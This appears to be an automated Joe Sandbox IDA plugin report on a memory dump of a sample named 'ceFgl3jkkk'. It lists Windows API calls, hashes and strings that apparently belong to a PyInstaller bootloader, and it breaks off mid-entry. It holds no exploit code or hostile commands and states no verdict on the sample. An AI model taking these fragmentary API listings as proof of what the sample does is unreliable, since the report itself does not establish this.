• Opcode ID: cbdc0820e60ef6b5c02852c9838e6dbde2c219231d4c2634b3c3e2098b1b19d0
• Instruction ID: d33b6fc810dc9a0516b7e832264c5b719ef5d9e796f19fcaff3039d439cc8d82
• Opcode Fuzzy Hash: cbdc0820e60ef6b5c02852c9838e6dbde2c219231d4c2634b3c3e2098b1b19d0
• Instruction Fuzzy Hash: BD0128377083195F9F11AE6DED50AAB3396EBC53383248120FA14CB158EA30C801BB50
APIs
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: 2fe2e3197cdd298c95c29f29c8ab82eb04910d717c57a7ffdefd5c7d3e99af51
• Instruction ID: b47e434e2d21b111a8465f1b092a3887b98e016366cb9959fc3150357e01a7d9
• Opcode Fuzzy Hash: 2fe2e3197cdd298c95c29f29c8ab82eb04910d717c57a7ffdefd5c7d3e99af51
• Instruction Fuzzy Hash: A3115AB1A0010AAFCF05DF58E94199F7BF4EF48304F044069F804EB251DA30DA12DB64
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d8cb16c0ed68794755dee3499a829f3980c3b08fb60c41143e5e71e23a383f7
• Instruction ID: 100c7452f0deb6b0d23e240a3caaaeb17fbaae67ae8569e991c19c1506b6a2a0
• Opcode Fuzzy Hash: 0d8cb16c0ed68794755dee3499a829f3980c3b08fb60c41143e5e71e23a383f7
• Instruction Fuzzy Hash: C9F0FC32901E145AD7213B6ADC05B5B36E88F81376F140755FE38931D1CB7DE90ABBA1
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F663F6,00000001,00000364,00000006,000000FF,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F67065
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 4f595e8d34d4b131a741000f2197e8a270a8dbc5d6f4d5ba275a44650c1a2156
• Instruction ID: dfc755ca9c7628ede7eaa05474e3197fa3aad0c210fd61459e14adb2f4c8c4f3
• Opcode Fuzzy Hash: 4f595e8d34d4b131a741000f2197e8a270a8dbc5d6f4d5ba275a44650c1a2156
• Instruction Fuzzy Hash: F8F0BE32A08329B6EB317B629C15B6B37589B817B8B244121FC08AA1C0CB24D841B6F0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00F60F97,00F7EE98,00000018,00000003,00F7EEB8), ref: 00F65BD4
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 81edc46d480ececd6ba9d3873fcde259bf81b5642f897dd4fd5ae207ff66cab5
• Instruction ID: fc02fb2bba9634e03361d370ad02d32b42a880e516708c6aca3ca04088f08efa
• Opcode Fuzzy Hash: 81edc46d480ececd6ba9d3873fcde259bf81b5642f897dd4fd5ae207ff66cab5
• Instruction Fuzzy Hash: 53E0E531904A3857E62126629C01B5E36589BC2BF0F590021EC08B20C0DF50DC0072E5
APIs
• _free.LIBCMT ref: 00F63EF0
  • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
  • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID:
• API String ID: 1353095263-0
• Opcode ID: d506a703889d1df9b84338a8fc89d2461505e676fc6750c7c70b1ee1d0b25cda
• Instruction ID: 68d517dbbbab155f516ebd410f7eab8e7d3e5845cae8cc1f0d9716a8d14d35cf
• Opcode Fuzzy Hash: d506a703889d1df9b84338a8fc89d2461505e676fc6750c7c70b1ee1d0b25cda
• Instruction Fuzzy Hash: B4F06D375502059F8724CE6CD900A82BBE4EF993217108529E89DD3220D330F912CB80
APIs
  • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
• LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,00F542A0,?,?,?,?,?,00F532CB,00000000,00000000), ref: 00F562A9
  • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ByteCharLibraryLoadMultiWide_free
• String ID:
• API String ID: 2186588979-0
• Opcode ID: 033691ccf5149d40cb841d55adc04927bfbf128c4c070bcb14c755458dadf0a9
• Instruction ID: d53d8e0c70de29091bbc44167acdf27ef22b9d8e3a3adfc621b8985a03366562
• Opcode Fuzzy Hash: 033691ccf5149d40cb841d55adc04927bfbf128c4c070bcb14c755458dadf0a9
• Instruction Fuzzy Hash: CBD0A773B4021033F52062B53C0BF1B79649BD1F52F040438FB08DB1C1E564690963A3
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,00F6E57F,?,?,00000000,?,00F6E57F,00000000,0000000C), ref: 00F6E23A
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 7981c14998fc25a05b7d19db6cf91c22a0eae49ebeeaf885383825aaae4742d4
• Instruction ID: f10a66afa7e949adf7d90b9b5c31a54a8b797fbcd415b6d70d92198432e69040
• Opcode Fuzzy Hash: 7981c14998fc25a05b7d19db6cf91c22a0eae49ebeeaf885383825aaae4742d4
• Instruction Fuzzy Hash: F6D06C3210010DBBDF028F84DC06EDA3BAAFB4C714F018000FA5856020C772E961EB91
APIs
• _free.LIBCMT ref: 00F5E378
  • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
  • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID:
• API String ID: 1353095263-0
• Opcode ID: cb0e52e07d19aed88f44ef5871020cea48750a9e516630401a30a74b753e8c05
• Instruction ID: 2de662f20f6b9d75b6e0769f2c72da5dfc320ee6b1c78629d1e5ea01de47a5b6
• Opcode Fuzzy Hash: cb0e52e07d19aed88f44ef5871020cea48750a9e516630401a30a74b753e8c05
• Instruction Fuzzy Hash: 97C04C71500248BBDB059B45D907E5E7BB9DB80364F204054F41557261DBB5EF44A690
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00F6042B
• GetLastError.KERNEL32 ref: 00F60438
  • Part of subcall function 00F60624: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00F604A8,?), ref: 00F60649
  • Part of subcall function 00F60624: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,00F604A8,?,?,?,?,00F604A8,?), ref: 00F6065D
• FindNextFileW.KERNEL32(?,?,?), ref: 00F6055A
• GetLastError.KERNEL32 ref: 00F60564
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
• String ID:
• API String ID: 3693236040-0
• Opcode ID: 1b5a516881bae2cec06a0d0043463566a7af8e0656e9601bdf979be2eb493b4e
• Instruction ID: 0ae6789b775f2cab069fe7cd0f2c318e5b4abd73dd0ef3a09e83c59c552c8d7b
• Opcode Fuzzy Hash: 1b5a516881bae2cec06a0d0043463566a7af8e0656e9601bdf979be2eb493b4e
• Instruction Fuzzy Hash: E551D7B19006189FCB35EFB4CC85AABB7E8AF44314F240A56E516C7281EF78DE44AF50
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F59EED
• IsDebuggerPresent.KERNEL32 ref: 00F59FB9
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F59FD9
• UnhandledExceptionFilter.KERNEL32(?), ref: 00F59FE3
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 166596d5fdfb0bf12ea1267aad2eb40ab6bfda72bbee71e74c74db34677bfb63
• Instruction ID: 57b4577b6469121106d9eba3259d8e8c36f7b6ef624ed7648801377cda07a101
• Opcode Fuzzy Hash: 166596d5fdfb0bf12ea1267aad2eb40ab6bfda72bbee71e74c74db34677bfb63
• Instruction Fuzzy Hash: AB315A75D0521DDBDB10DF64D9897CCBBF8AF08305F1041AAE50CA7250EB709B88AF45
APIs
• GetProcAddress.KERNEL32(00F531FD,Tcl_Init), ref: 00F55282
• GetProcAddress.KERNEL32(00F531FD,Tcl_CreateInterp), ref: 00F552AB
  • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
Strings
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: AddressProc$ErrorLast
• String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 4214558900-2208601799
• Opcode ID: a0fc877d171adfd2ed7000cb62b6bb94d57ecf5a4a5ecd5408dc674aacfad696
• Instruction ID: 7c67fa0a043817b5edd0f48540477e452df1304ebb6fe0ebe541d920b6d020c0
• Opcode Fuzzy Hash: a0fc877d171adfd2ed7000cb62b6bb94d57ecf5a4a5ecd5408dc674aacfad696
• Instruction Fuzzy Hash: 7DB1AF76F94B1A215640273D7C529A93B984ED2F377008337FA28E81D1FBD1C68976A3
APIs
• GetDialogBaseUnits.USER32 ref: 00F51B0B
• MulDiv.KERNEL32(?,00000032,00000004), ref: 00F51B21
• MulDiv.KERNEL32(00000000,0000000E,00000008), ref: 00F51B32
• SystemParametersInfoW.USER32(00000029,000001F8,000001F8,00000000), ref: 00F51B7B
• CreateFontIndirectW.GDI32(?), ref: 00F51B8D
• #380.COMCTL32(00000000,00007F01,00000001,?), ref: 00F51BAD
• CreateWindowExW.USER32(00000000,STATIC,00000000,50000003,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51BE4
• CreateWindowExW.USER32(00000000,STATIC,00000000,50000000,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51C17
• CreateWindowExW.USER32(00000200,EDIT,00000000,50300884,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51C4D
• CreateWindowExW.USER32(00000000,BUTTON,Close,50000001,80000000,80000000,80000000,80000000,?,00000001,?,00000000), ref: 00F51C83
• SendMessageW.USER32(?,00000080,00000000,?), ref: 00F51C9D
• SendMessageW.USER32(?,00000080,00000001,?), ref: 00F51CAB
• SendMessageW.USER32(?,00000172,00000001,?), ref: 00F51CBC
• SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CD0
• SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CE2
• SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CF4
• SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51D06
• SendMessageW.USER32(?,0000000C,00000000,?), ref: 00F51D13
• SendMessageW.USER32(?,0000000C,00000000,?), ref: 00F51D22
• GetClientRect.USER32(?,?), ref: 00F51D2C
  • Part of subcall function 00F51E30: GetDC.USER32(?), ref: 00F51E50
  • Part of subcall function 00F51E30: SelectObject.GDI32(00000000,?), ref: 00F51EA0
  • Part of subcall function 00F51E30: DrawTextW.USER32(00000000,?,000000FF,?,00002550), ref: 00F51EB5
                                                                                                                        • Part of subcall function 00F51E30: SelectObject.GDI32(00000000,00000000), ref: 00F51EC6
                                                                                                                        • Part of subcall function 00F51E30: ReleaseDC.USER32(?,00000000), ref: 00F51ECF
                                                                                                                        • Part of subcall function 00F51E30: MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F1C
                                                                                                                        • Part of subcall function 00F51E30: MoveWindow.USER32(?,?,?,?,00000014,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F4B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$Create$MoveObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                      • String ID: @U=u$BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                      • API String ID: 4195728924-25750965
                                                                                                                      • Opcode ID: 3c18f9affd25c9dc881479f8d8ce43079b7ba192e61f58d354c1a3a554b129e7
                                                                                                                      • Instruction ID: 6898291b3241382566754ad895d9d568f41699417e5133de9651262db7700f52
                                                                                                                      • Opcode Fuzzy Hash: 3c18f9affd25c9dc881479f8d8ce43079b7ba192e61f58d354c1a3a554b129e7
                                                                                                                      • Instruction Fuzzy Hash: 83612F31680314FAFB315F508C8AF967F65EF08B01F244166BF087D1E6D6B1A524EB6A
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3409252457-0
                                                                                                                      • Opcode ID: ed6bcccc665aa8bb5381d8e38cae2c9e33cd55fdc12e65e2b80ebb1c3a9ae4fa
                                                                                                                      • Instruction ID: 7eebc7faafd60e2475b944ebb65371d9c55c0f583b754b6d4413a7724ec5b1a3
                                                                                                                      • Opcode Fuzzy Hash: ed6bcccc665aa8bb5381d8e38cae2c9e33cd55fdc12e65e2b80ebb1c3a9ae4fa
                                                                                                                      • Instruction Fuzzy Hash: 7DD108B1D00305AFDB24AFA48C42A7E77B4EF513A4F04436DE915A7281EF759902FB61
                                                                                                                      APIs
                                                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 00F5254A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                                                      • String ID: %s%s%s$%s%s%s%s%s$%s%s%s%s%s%s%s$%s%s%s.exe$%s%s%s.pkg$Archive not found: %s$Archive path exceeds PATH_MAX$Error copying %s$Error extracting %s$Error opening archive %s$malloc
                                                                                                                      • API String ID: 601868998-2292630174
                                                                                                                      • Opcode ID: 95fdfbe431a48bd0e541fa71c2891248da0206687d180c950dbde6f5693ccf93
                                                                                                                      • Instruction ID: 1037d075f602eea2b7624eb9bc4f1bdeb171a943359c180db230c02fa46f2082
                                                                                                                      • Opcode Fuzzy Hash: 95fdfbe431a48bd0e541fa71c2891248da0206687d180c950dbde6f5693ccf93
                                                                                                                      • Instruction Fuzzy Hash: EDA12CB29043407AD731D6609C82FBB739CAF56312F444A16FE89C6182E735E60DB6A3
                                                                                                                      Strings
                                                                                                                      • Failed to extract %s: failed to open archive file!, xrefs: 00F514A5
                                                                                                                      • Failed to extract %s: failed to open target file!, xrefs: 00F51466
                                                                                                                      • fopen, xrefs: 00F5146B
                                                                                                                      • fseek, xrefs: 00F514DC
                                                                                                                      • fwrite, xrefs: 00F515B3
                                                                                                                      • Failed to extract %s: failed to write data chunk!, xrefs: 00F515AE
                                                                                                                      • fread, xrefs: 00F515C3
                                                                                                                      • Failed to extract %s: failed to read data chunk!, xrefs: 00F515BE
                                                                                                                      • malloc, xrefs: 00F51528
                                                                                                                      • Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00F51523
                                                                                                                      • Failed to extract %s: failed to seek to the entry's data!, xrefs: 00F514D7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
